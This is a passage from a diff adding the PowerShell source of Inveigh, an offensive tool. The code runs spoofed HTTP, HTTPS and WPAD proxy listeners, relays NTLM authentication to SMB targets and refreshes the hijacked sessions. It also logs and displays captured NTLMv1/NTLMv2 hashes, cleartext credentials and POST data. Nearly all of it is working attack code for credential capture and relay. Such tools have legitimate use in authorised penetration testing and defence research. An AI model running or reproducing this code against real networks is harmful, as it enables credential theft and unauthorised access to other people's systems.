+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
+ }
+
+ $HTTP_timestamp = Get-Date -format r
+ $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+ $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+ $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+ if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
+ {
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
+ }
+
+ $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
+
+ if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_content_type)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_cache_control)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_send)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ }
+
+ Start-Sleep -m 10
+ $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
+ $HTTP_client_handle_old = $HTTP_client.Client.Handle
+
+ if($HTTP_client_close)
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_client.Client.Close()
+ }
+ else
+ {
+ $HTTP_client.Close()
+ }
+
+ }
+
+ }
+ else
+ {
+
+ if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ $HTTP_reset_delay = $false
+ }
+ else
+ {
+ Start-Sleep -m 100
+ }
+
+ }
+
+ }
+
+ $HTTP_client.Close()
+ start-sleep -s 1
+ $HTTP_listener.Server.blocking = $false
+ Start-Sleep -s 1
+ $HTTP_listener.Server.Close()
+ Start-Sleep -s 1
+ $HTTP_listener.Stop()
+}
+
+# Control Relay Loop ScriptBlock
+$control_relay_scriptblock =
+{
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime,$SigningCheck)
+
+ function SigningCheck
+ {
+ $target_list = $inveigh.target_list
+
+ ForEach($target_entry in $target_list)
+ {
+ $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+ $SMB_relay_socket.Client.ReceiveTimeout = 5000
+ $SMB_relay_socket.Connect($target_entry,"445")
+
+ if(!$SMB_relay_socket.connected)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
+ }
+ else
+ {
+ SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null
+ }
+
+ }
+
+ if(!$inveigh.target_list)
+ {
+ StopInveigh "empty target list"
+ }
+
+ }
+
+ function OutputQueueLoop
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+ function StopInveigh
+ {
+ param ([String]$exit_message)
+
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ {
+
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null
+ }
+
+ }
+
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
+ if($inveigh.relay_running)
+ {
+ Start-Sleep -S 1
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+ OutputQueueLoop
+ Start-Sleep -S 1
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
+ {
+ Start-Sleep -S 1
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+ OutputQueueLoop
+ Start-Sleep -S 1
+ $inveigh.running = $false
+ }
+
+ $inveigh.HTTPS = $false
+ }
+
+ if($SigningCheck -eq 'Y')
+ {
+ $SigningCheck = 'N'
+ SigningCheck
+ }
+
+ if($RunTime)
+ {
+ $control_timeout = New-TimeSpan -Minutes $RunTime
+ $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ while($inveigh.relay_running)
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
+ {
+ Start-Sleep -S 5
+ StopInveigh "disabled relay"
+ }
+
+ if($RunTime)
+ {
+
+ if($control_stopwatch.Elapsed -ge $control_timeout)
+ {
+ StopInveigh "run time"
+ }
+
+ }
+
+ if($inveigh.file_output -and -not $inveigh.control)
+ {
+
+ while($inveigh.log_file_queue.Count -gt 0)
+ {
+ $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+ $inveigh.log_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv1_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+ $inveigh.NTLMv1_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv2_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+ $inveigh.NTLMv2_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.cleartext_file_queue.Count -gt 0)
+ {
+ $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+ $inveigh.cleartext_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.form_input_file_queue.Count -gt 0)
+ {
+ $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
+ $inveigh.form_input_file_queue.RemoveAt(0)
+ }
+
+ }
+
+ if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
+ {
+
+ while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
+ {
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+
+# Session Refresh Loop ScriptBlock
+$session_refresh_scriptblock =
+{
+ param ($SessionRefresh)
+
+ while($inveigh.relay_running)
+ {
+
+ if($inveigh.session_socket_table.Count -gt 0)
+ {
+ $session = 0
+
+ while($session -le $inveigh.session_socket_table.Count)
+ {
+ $session_timespan = New-TimeSpan $inveigh.session_list[$session]."Last Activity" $(Get-Date)
+
+ if($inveigh.session_socket_table[$session].Connected -and $inveigh.session_lock_table[$session] -eq 'open' -and $session_timespan.Minutes -ge $SessionRefresh)
+ {
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_client_receive = New-Object System.Byte[] 1024
+ $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ #$packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed")
+ }
+
+ $inveigh.session_lock_table[$Session] = 'open'
+ $inveigh.session_list[$Session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ $inveigh.session_message_ID_table[$Session] = $SMB2_message_ID
+ }
+
+ $session++
+ }
+
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+}
+
+ # HTTP Listener Startup Function
+function HTTPListener
+{
+ $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $false
+ $HTTP_runspace.Open()
+ $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTP_powershell = [PowerShell]::Create()
+ $HTTP_powershell.Runspace = $HTTP_runspace
+ $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $HTTP_powershell.BeginInvoke() > $null
+}
+
+# HTTPS Listener Startup Function
+function HTTPSListener
+{
+ $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $true
+ $proxy_listener = $false
+ $HTTPS_runspace.Open()
+ $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTPS_powershell = [PowerShell]::Create()
+ $HTTPS_powershell.Runspace = $HTTPS_runspace
+ $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $HTTPS_powershell.BeginInvoke() > $null
+}
+
+# Proxy Listener Startup Function
+function ProxyListener
+{
+ $proxy_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $true
+ $proxy_runspace.Open()
+ $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $proxy_powershell = [PowerShell]::Create()
+ $proxy_powershell.Runspace = $proxy_runspace
+ $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($packet_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $proxy_powershell.BeginInvoke() > $null
+}
+
+# Control Relay Startup Function
+function ControlRelayLoop
+{
+ $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
+ $control_relay_runspace.Open()
+ $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $control_relay_powershell = [PowerShell]::Create()
+ $control_relay_powershell.Runspace = $control_relay_runspace
+ $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($packet_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $RelayAutoExit).AddArgument($RunTime).AddArgument($SigningCheck) > $null
+ $control_relay_powershell.BeginInvoke() > $null
+}
+
+# Session Refresh Startup Function
+function SessionRefreshLoop
+{
+ $session_refresh_runspace = [RunspaceFactory]::CreateRunspace()
+ $session_refresh_runspace.Open()
+ $session_refresh_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $session_refresh_powershell = [PowerShell]::Create()
+ $session_refresh_powershell.Runspace = $session_refresh_runspace
+ $session_refresh_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($packet_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($session_refresh_scriptblock).AddArgument($SessionRefresh) > $null
+ $session_refresh_powershell.BeginInvoke() > $null
+}
+
+# HTTP Server Start
+if($HTTP -eq 'Y')
+{
+ HTTPListener
+ Start-Sleep -m 50
+}
+
+# HTTPS Server Start
+if($HTTPS -eq 'Y')
+{
+ HTTPSListener
+ Start-Sleep -m 50
+}
+
+# Proxy Server Start
+if($Proxy -eq 'Y')
+{
+ ProxyListener
+ Start-Sleep -m 50
+}
+
+# Control Relay Loop Start
+ControlRelayLoop
+
+# Session Refresh Loop Start
+if($SessionRefresh -gt 0)
+{
+ SessionRefreshLoop
+}
+
+# Console Output Loop
+try
+{
+
+ if($inveigh.console_output)
+ {
+
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ :console_loop while($inveigh.relay_running -and $inveigh.console_output)
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+ {
+
+ if($inveigh.cleartext_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
+
+ foreach($unique_cleartext in $inveigh.cleartext_list)
+ {
+ if($unique_cleartext -ne $unique_cleartext_last)
+ {
+ Write-Output($unique_cleartext + $inveigh.newline)
+ }
+
+ $unique_cleartext_last = $unique_cleartext
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.POST_request_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline)
+ $inveigh.POST_request_list.Sort()
+
+ foreach($unique_POST_request in $inveigh.POST_request_list)
+ {
+ if($unique_POST_request -ne $unique_POST_request_last)
+ {
+ Write-Output($unique_POST_request + $inveigh.newline)
+ }
+
+ $unique_POST_request_last = $unique_POST_request
+ }
+
+ Start-Sleep -m 5
+ }
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
+
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+ {
+ Write-Output($NTLMv1_username + $inveigh.newline)
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+ }
+
+ if($inveigh.console_input)
+ {
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+
+}
+finally
+{
+
+ if($Tool -eq 2)
+ {
+ $inveigh.relay_running = $false
+ }
+
+}
+
+}
+#End Invoke-InveighRelay
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
+ Write-Output $output
+ }
+ else
+ {
+ $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
+ Write-Warning $output
+ }
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ {
+
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Warning $output
+ }
+
+ }
+
+ if($inveigh.relay_running)
+ {
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
+ {
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Output $output
+ $inveigh.running = $false
+ }
+
+ $inveigh.HTTPS = $false
+ Start-Sleep -S 5
+ }
+ else
+ {
+ Write-Output "[-] There are no running Inveigh functions"
+ }
+
+}
+
+}
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER DNS
+Get added DNS host records.
+
+.PARAMETER DNSFailed
+Get failed DNS host record adds.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER POSTRequest
+Get captured POST requests.
+
+.PARAMETER POSTRequestUnique
+Get unique captured POST request.
+#>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if($Console -or $PSBoundParameters.Count -eq 0)
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ if($inveigh.output_stream_only)
+ {
